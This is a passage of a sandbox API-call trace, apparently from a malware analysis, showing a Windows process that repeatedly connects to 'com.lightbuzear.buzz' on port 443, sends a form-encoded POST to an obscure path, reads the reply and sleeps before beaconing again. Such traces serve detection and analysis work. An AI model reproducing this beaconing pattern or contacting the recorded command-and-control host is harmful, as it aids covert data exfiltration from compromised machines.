0xcc0008 [0285.237] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce710 [0285.238] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce740 [0285.238] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce710 | out: hHeap=0x4780000) returned 1 [0285.238] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce730 [0285.238] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce740 | out: hHeap=0x4780000) returned 1 [0285.238] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce6c0 [0285.238] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce730 | out: hHeap=0x4780000) returned 1 [0285.238] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce710 [0285.238] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6c0 | out: hHeap=0x4780000) returned 1 [0285.238] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x480f0e0 [0285.238] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce710 | out: hHeap=0x4780000) returned 1 [0285.238] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x480eb10 [0285.238] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480f0e0 | out: hHeap=0x4780000) returned 1 [0285.238] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b4d0 [0285.238] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480eb10 | out: hHeap=0x4780000) returned 1 [0285.238] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x10) returned 0x480eca8 [0285.238] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x47bf1a8 [0285.239] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47bf1a8 | out: hHeap=0x4780000) returned 1 [0285.239] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b4d0 | out: hHeap=0x4780000) returned 1 [0285.239] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x47bef00 [0285.239] LoadLibraryW (lpLibFileName="Wininet.dll") returned 0x71570000 [0285.239] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x47bf108 [0285.239] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce630 [0285.239] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce600 [0285.240] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce630 | out: hHeap=0x4780000) returned 1 [0285.240] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce5a0 [0285.240] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce600 | out: hHeap=0x4780000) returned 1 [0285.240] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce750 [0285.240] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5a0 | out: hHeap=0x4780000) returned 1 [0285.240] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce6b0 [0285.240] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce750 | out: hHeap=0x4780000) returned 1 [0285.240] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x480eb70 [0285.240] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6b0 | out: hHeap=0x4780000) returned 1 [0285.240] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x480ec30 [0285.240] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480eb70 | out: hHeap=0x4780000) returned 1 [0285.240] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b4d0 [0285.240] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480ec30 | out: hHeap=0x4780000) returned 1 [0285.240] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x10) returned 0x480ec90 [0285.240] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x47bf040 [0285.241] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47bf040 | out: hHeap=0x4780000) returned 1 [0285.241] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b4d0 | out: hHeap=0x4780000) returned 1 [0285.241] HttpOpenRequestA (hConnect=0xcc0008, lpszVerb="POST", lpszObjectName="Kolpt523ytcserstrew/torel", lpszVersion=0x0, lpszReferrer=0x0, lplpszAcceptTypes=0x0, dwFlags=0x800000, dwContext=0x0) returned 0xcc000c [0285.241] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce6a0 [0285.241] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce670 [0285.242] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6a0 | out: hHeap=0x4780000) returned 1 [0285.242] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce6a0 [0285.242] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce670 | out: hHeap=0x4780000) returned 1 [0285.242] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce730 [0285.242] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6a0 | out: hHeap=0x4780000) returned 1 [0285.242] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce5a0 [0285.242] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce730 | out: hHeap=0x4780000) returned 1 [0285.242] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x480eb10 [0285.242] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5a0 | out: hHeap=0x4780000) returned 1 [0285.242] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x480ec48 [0285.242] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480eb10 | out: hHeap=0x4780000) returned 1 [0285.242] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b5d0 [0285.242] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480ec48 | out: hHeap=0x4780000) returned 1 [0285.242] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1c) returned 0x47bf040 [0285.242] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b5d0 | out: hHeap=0x4780000) returned 1 [0285.242] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2a) returned 0x47fb908 [0285.242] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47bf040 | out: hHeap=0x4780000) returned 1 [0285.242] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x47bf040 [0285.242] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x30) returned 0x47fba58 [0285.243] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x47bf068 [0285.243] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fba58 | out: hHeap=0x4780000) returned 1 [0285.243] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fb908 | out: hHeap=0x4780000) returned 1 [0285.244] GetProcAddress (hModule=0x71570000, lpProcName="InternetSetOptionA") returned 0x71611dc0 [0285.244] InternetSetOptionA (hInternet=0xcc000c, dwOption=0x1f, lpBuffer=0xde1c8*, dwBufferLength=0x4) returned 1 [0285.244] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47bf068 | out: hHeap=0x4780000) returned 1 [0285.244] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce710 [0285.244] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce5e0 [0285.244] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce710 | out: hHeap=0x4780000) returned 1 [0285.244] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce6c0 [0285.244] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5e0 | out: hHeap=0x4780000) returned 1 [0285.244] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce6e0 [0285.244] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6c0 | out: hHeap=0x4780000) returned 1 [0285.245] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce740 [0285.333] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6e0 | out: hHeap=0x4780000) returned 1 [0285.333] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x480eb58 [0285.333] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce740 | out: hHeap=0x4780000) returned 1 [0285.333] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x480ed08 [0285.333] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480eb58 | out: hHeap=0x4780000) returned 1 [0285.333] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b5d0 [0285.333] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480ed08 | out: hHeap=0x4780000) returned 1 [0285.333] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1c) returned 0x47bf1a8 [0285.333] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b5d0 | out: hHeap=0x4780000) returned 1 [0285.333] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2a) returned 0x47fbf28 [0285.334] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47bf1a8 | out: hHeap=0x4780000) returned 1 [0285.334] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x47bf1a8 [0285.334] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x30) returned 0x47fbc50 [0285.334] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x47bf180 [0285.334] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fbc50 | out: hHeap=0x4780000) returned 1 [0285.335] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fbf28 | out: hHeap=0x4780000) returned 1 [0285.335] GetProcAddress (hModule=0x71570000, lpProcName="HttpSendRequestA") returned 0x71638e60 [0285.336] HttpSendRequestA (hRequest=0xcc000c, lpszHeaders="Content-Type:application/x-www-form-urlencoded", dwHeadersLength=0x2e, lpOptional=0x47a6f78*, dwOptionalLength=0x4b2) returned 1 [0286.328] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47bf180 | out: hHeap=0x4780000) returned 1 [0286.328] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce710 [0286.328] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce5e0 [0286.328] GetModuleHandleA (lpModuleName="Wininet.dll") returned 0x71570000 [0286.328] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce5a0 [0286.328] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce690 [0286.328] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5a0 | out: hHeap=0x4780000) returned 1 [0286.328] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce620 [0286.328] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce690 | out: hHeap=0x4780000) returned 1 [0286.328] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce6d0 [0286.329] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce620 | out: hHeap=0x4780000) returned 1 [0286.329] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce610 [0286.329] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6d0 | out: hHeap=0x4780000) returned 1 [0286.329] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x480ed50 [0286.329] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce610 | out: hHeap=0x4780000) returned 1 [0286.329] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x480ecd8 [0286.329] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480ed50 | out: hHeap=0x4780000) returned 1 [0286.329] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b5d0 [0286.329] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480ecd8 | out: hHeap=0x4780000) returned 1 [0286.329] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1c) returned 0x47bed48 [0286.329] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b5d0 | out: hHeap=0x4780000) returned 1 [0286.329] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2a) returned 0x47fbda0 [0286.329] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47bed48 | out: hHeap=0x4780000) returned 1 [0286.329] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x47bf180 [0286.329] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x30) returned 0x47fba20 [0286.329] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x47bed48 [0286.330] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fba20 | out: hHeap=0x4780000) returned 1 [0286.330] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fbda0 | out: hHeap=0x4780000) returned 1 [0286.330] GetProcAddress (hModule=0x71570000, lpProcName="InternetReadFile") returned 0x715f7320 [0286.330] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0xde2f4, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0xde290 | out: lpBuffer=0xde2f4*, lpdwNumberOfBytesRead=0xde290*=0x5) returned 1 [0286.331] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47bed48 | out: hHeap=0x4780000) returned 1 [0286.331] GetModuleHandleA (lpModuleName="Wininet.dll") returned 0x71570000 [0286.331] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce5a0 [0286.331] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce570 [0286.331] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5a0 | out: hHeap=0x4780000) returned 1 [0286.331] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce630 [0286.331] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce570 | out: hHeap=0x4780000) returned 1 [0286.331] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce5a0 [0286.331] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce630 | out: hHeap=0x4780000) returned 1 [0286.331] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce640 [0286.332] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5a0 | out: hHeap=0x4780000) returned 1 [0286.332] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x480ed50 [0286.332] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce640 | out: hHeap=0x4780000) returned 1 [0286.332] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x480ebd0 [0286.332] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480ed50 | out: hHeap=0x4780000) returned 1 [0286.332] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b5d0 [0286.332] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480ebd0 | out: hHeap=0x4780000) returned 1 [0286.332] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1c) returned 0x47bf068 [0286.332] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b5d0 | out: hHeap=0x4780000) returned 1 [0286.332] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2a) returned 0x47fba20 [0286.332] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47bf068 | out: hHeap=0x4780000) returned 1 [0286.332] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x47bf068 [0286.332] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x30) returned 0x47fbf28 [0286.332] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x47bed48 [0286.332] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fbf28 | out: hHeap=0x4780000) returned 1 [0286.333] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fba20 | out: hHeap=0x4780000) returned 1 [0286.333] GetProcAddress (hModule=0x71570000, lpProcName="InternetReadFile") returned 0x715f7320 [0286.333] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0xde2f4, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0xde290 | out: lpBuffer=0xde2f4*, lpdwNumberOfBytesRead=0xde290*=0x0) returned 1 [0286.334] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47bed48 | out: hHeap=0x4780000) returned 1 [0286.334] InternetCloseHandle (hInternet=0xcc000c) returned 1 [0286.334] InternetCloseHandle (hInternet=0xcc0008) returned 1 [0286.334] InternetCloseHandle (hInternet=0xcc0004) returned 1 [0286.334] FreeLibrary (hLibModule=0x71570000) returned 1 [0286.334] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5e0 | out: hHeap=0x4780000) returned 1 [0286.334] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce710 | out: hHeap=0x4780000) returned 1 [0286.334] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47bf108 | out: hHeap=0x4780000) returned 1 [0286.335] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47bef00 | out: hHeap=0x4780000) returned 1 [0286.335] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47bee38 | out: hHeap=0x4780000) returned 1 [0286.335] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47beb68 | out: hHeap=0x4780000) returned 1 [0286.335] Sleep (dwMilliseconds=0x2710) [0286.351] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce680 [0286.351] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce5c0 [0286.351] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce680 | out: hHeap=0x4780000) returned 1 [0286.351] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce640 [0286.351] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5c0 | out: hHeap=0x4780000) returned 1 [0286.352] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce5a0 [0286.352] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce640 | out: hHeap=0x4780000) returned 1 [0286.352] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce610 [0286.352] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5a0 | out: hHeap=0x4780000) returned 1 [0286.352] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x480f0e0 [0286.352] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce610 | out: hHeap=0x4780000) returned 1 [0286.352] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x480f200 [0286.352] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480f0e0 | out: hHeap=0x4780000) returned 1 [0286.352] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b4d0 [0286.352] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480f200 | out: hHeap=0x4780000) returned 1 [0286.352] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x10) returned 0x480f0e0 [0286.352] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x47beb68 [0286.353] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47beb68 | out: hHeap=0x4780000) returned 1 [0286.353] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b4d0 | out: hHeap=0x4780000) returned 1 [0286.353] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x47beb68 [0286.353] LoadLibraryW (lpLibFileName="Urlmon.dll") returned 0x71780000 [0286.353] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce730 [0286.353] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce6e0 [0286.354] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce730 | out: hHeap=0x4780000) returned 1 [0286.354] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce710 [0286.354] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6e0 | out: hHeap=0x4780000) returned 1 [0286.354] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce620 [0286.354] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce710 | out: hHeap=0x4780000) returned 1 [0286.354] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce5a0 [0286.354] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce620 | out: hHeap=0x4780000) returned 1 [0286.354] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x480f200 [0286.354] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5a0 | out: hHeap=0x4780000) returned 1 [0286.355] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x480ecc0 [0286.355] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480f200 | out: hHeap=0x4780000) returned 1 [0286.355] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b590 [0286.355] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480ecc0 | out: hHeap=0x4780000) returned 1 [0286.355] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1c) returned 0x47bef00 [0286.355] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b590 | out: hHeap=0x4780000) returned 1 [0286.355] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2a) returned 0x47fba20 [0286.355] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47bef00 | out: hHeap=0x4780000) returned 1 [0286.355] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x47bf108 [0286.355] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x30) returned 0x47fb898 [0286.355] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x47bed48 [0286.355] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fb898 | out: hHeap=0x4780000) returned 1 [0286.356] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fba20 | out: hHeap=0x4780000) returned 1 [0286.356] GetProcAddress (hModule=0x71780000, lpProcName="ObtainUserAgentString") returned 0x71852f30 [0286.356] ObtainUserAgentString (in: dwOption=0x0, pszUAOut=0xdf2f4, cbSize=0xde1cc | out: pszUAOut="Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)", cbSize=0xde1cc) returned 0x0 [0286.356] FreeLibrary (hLibModule=0x71780000) returned 1 [0286.356] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47bed48 | out: hHeap=0x4780000) returned 1 [0286.356] InternetOpenA (lpszAgent="Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)", dwAccessType=0x0, lpszProxy=0x0, lpszProxyBypass=0x0, dwFlags=0x0) returned 0xcc0004 [0286.356] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x47bef00 [0286.356] InternetConnectA (hInternet=0xcc0004, lpszServerName="com.lightbuzear.buzz", nServerPort=0x1bb, lpszUserName=0x0, lpszPassword=0x0, dwService=0x3, dwFlags=0x0, dwContext=0x0) returned 0xcc0008 [0286.357] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce670 [0286.357] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce570 [0286.358] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce670 | out: hHeap=0x4780000) returned 1 [0286.358] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce5e0 [0286.358] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce570 | out: hHeap=0x4780000) returned 1 [0286.358] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce690 [0286.358] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5e0 | out: hHeap=0x4780000) returned 1 [0286.358] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce5a0 [0286.358] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce690 | out: hHeap=0x4780000) returned 1 [0286.358] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x480eba0 [0286.358] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5a0 | out: hHeap=0x4780000) returned 1 [0286.358] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x480eaf8 [0286.358] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480eba0 | out: hHeap=0x4780000) returned 1 [0286.358] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b590 [0286.358] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480eaf8 | out: hHeap=0x4780000) returned 1 [0286.358] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x10) returned 0x480ec18 [0286.358] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x47bed48 [0286.358] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47bed48 | out: hHeap=0x4780000) returned 1 [0286.358] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b590 | out: hHeap=0x4780000) returned 1 [0286.359] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x47bed48 [0286.359] LoadLibraryW (lpLibFileName="Wininet.dll") returned 0x71570000 [0286.359] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x47bee38 [0286.359] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce740 [0286.359] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce6c0 [0286.359] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce740 | out: hHeap=0x4780000) returned 1 [0286.359] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 